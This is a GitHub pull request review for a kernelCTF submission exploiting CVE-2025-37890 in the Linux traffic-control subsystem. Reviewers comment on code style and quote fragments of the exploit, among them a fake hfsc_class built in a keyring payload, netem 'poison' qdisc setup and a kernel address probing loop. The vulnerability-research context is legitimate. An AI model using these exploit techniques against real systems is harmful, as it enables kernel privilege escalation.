Add kernelCTF CVE-2025-37890_lts_cos_mitigation#302
Add kernelCTF CVE-2025-37890_lts_cos_mitigation#302phlaie wants to merge 4 commits intogoogle:masterfrom
Conversation
|
Working on addressing LTS stability issues (same as PR 301). |
koczkatamas
added
the
kCTF: vuln OK
koczkatamas
changed the title
matrizzo
left a comment
matrizzo
left a comment
There was a problem hiding this comment.
Hi, thank you for your submission. There are a few style issues, please take a look at our style guide and try to fix them. In particular try to get rid of all the unused code and assign names to all hardcoded constants/explain why they have that value.
| void mypause() | ||
| { | ||
| printf("[~] pausing... (press enter to continue)\n"); | ||
| char scratch[11]; | ||
| read(0, scratch, 10); // wait for input | ||
| } |
There was a problem hiding this comment.
Remove unused code parts from the source code. The function mypause is defined but never called.
https://google.github.io/security-research/kernelctf/style_guide#unused-code
| size_t candidate = 0; | ||
| size_t hashmap[1024]; // ~ 0xffffffff80000000-0xffffffffc0000000 | ||
| memset(&hashmap, 0, sizeof(hashmap)); | ||
| sleep(10); |
There was a problem hiding this comment.
Add a comment to every sleep() explaining what you are waiting for.
https://google.github.io/security-research/kernelctf/style_guide#sleeping-waiting
|
|
||
| for (size_t i = 0; i < REPEAT; i++) { | ||
| set_cpu(i % 2); | ||
| sleep(1); |
There was a problem hiding this comment.
Add a comment to every sleep() explaining what you are waiting for.
https://google.github.io/security-research/kernelctf/style_guide#sleeping-waiting
| int send_req_noblock(int priority) | ||
| { | ||
| return _send_req(priority, 1); | ||
| } |
There was a problem hiding this comment.
This function is not used
https://google.github.io/security-research/kernelctf/style_guide#unused-code
|
|
||
| /*keyring section*/ | ||
| #define KEY_DESC_SIZE (0x200 - 0x18 + 1) | ||
| char key_desc[KEY_DESC_SIZE]; |
There was a problem hiding this comment.
This should be a local variable.
https://google.github.io/security-research/kernelctf/style_guide#miscellaneous-notes
| int setup_vuln_tree(const int netlink_fd, const char *multiq_band_name) | ||
| { | ||
| // create netem with poison settings | ||
| SYSOK(create_qdisc_netem(netlink_fd, get_id("3:0"), get_id(multiq_band_name))); // :1 is bands[0], :2 is bands[1] |
There was a problem hiding this comment.
Use constants here for the handle IDs like "3:0".
| // 1. setup plugs | ||
| for (int i = 0; i < num_tx; i++) | ||
| { | ||
| int band = 0x20000 + i + 1; |
There was a problem hiding this comment.
These constants should be named/explained.
| struct netlink_send_cb_struct | ||
| { | ||
| void (*cb)(char *, size_t, void *); | ||
| void *cb_out; | ||
| }; |
There was a problem hiding this comment.
This structure appears to be unused, it's only pased to __netlink_send and the only time that function is called that argument is NULL.
| key_desc[CF_NODE_OFFSET - KEY_DESC_HEADER_SIZE] = 1; | ||
|
|
||
| /* hfsc_class.cl_e > cur_time (fail eltree_get_mindl)*/ | ||
| *(size_t *)&key_desc[CL_E_OFFSET - KEY_DESC_HEADER_SIZE] = 0xffffffffffffffff; |
There was a problem hiding this comment.
Use UINT64_MAX instead of 0xffffffffffffffff
| close(memfd); | ||
|
|
||
| while (check_core() == 0) | ||
| usleep(100); // 0.1ms |
There was a problem hiding this comment.
This sleep should have a comment that explains why it's here.
3 participants
No description provided.